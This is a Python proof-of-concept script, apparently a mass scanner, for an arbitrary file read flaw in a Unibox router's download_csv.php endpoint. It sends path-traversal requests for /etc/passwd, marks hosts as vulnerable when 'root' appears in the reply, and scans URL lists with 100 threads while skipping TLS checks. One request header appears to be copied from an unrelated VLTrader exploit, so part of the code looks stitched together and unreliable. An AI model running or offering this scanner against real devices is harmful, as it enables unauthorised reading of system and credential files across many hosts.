import argparse,json,requests,sys
from multiprocessing.dummy import Pool

import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def banner():
    pass
def poc(target):
    payload = "/tools/download_csv.php?download_file=../../../etc/passwd"
    headers = {
        "Accept-Encoding": "gzip, deflate",
        "Accept": "application/json, text/plain, */*",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0",
        "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2"
    }
    headers2 = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0",
        "Retrieve": "l=Ab1234-RQ0258;n=VLTrader;v=7.2.1;a=1337;po=1337;s=True;b=False;pp=1337;path=../../etc/passwd"
    }

    try :
        res1 = requests.get(url=target,headers=headers,timeout=5,verify=False)
        if res1.status_code == 200:
            res2 = requests.get(url=target+payload,headers=headers2,timeout=5,verify=False)
            if 'root' in res2.text:
                print(f"[+]{target}存在任意文件读取漏洞")
                with open('result.txt','a',encoding='utf-8') as fp:
                        fp.write(target+'\n')
            else:
                print (f"[-]{target}不存在任意文件读取")
        else:
            print(f"[*]{target}访问有问题，请手工检查")
    except:
        pass
def main():
    banner()

    parse = argparse.ArgumentParser(description="Unibox路由器download_csv.php接口存在任意文件读取")

    parse.add_argument('-u','--url',dest='url',type=str,help="please input your link")
    parse.add_argument('-f','--file',dest='file',type=str,help="please input your file path")



    args = parse .parse_args()


    if args.url and not args.file:

        poc(args.url)
    elif args.file and not args.url:
        url_list = []
        with open (args.file,'r',encoding='utf-8') as fp :
            for i in fp.readlines() :
                url_list.append(i.strip())
        mp = Pool(100)
        mp.map(poc,url_list)
        mp.close
        mp.join
    else :
        print(f"usage:Python{sys.argv[0]} -h")

if __name__ == "__main__":
    main()
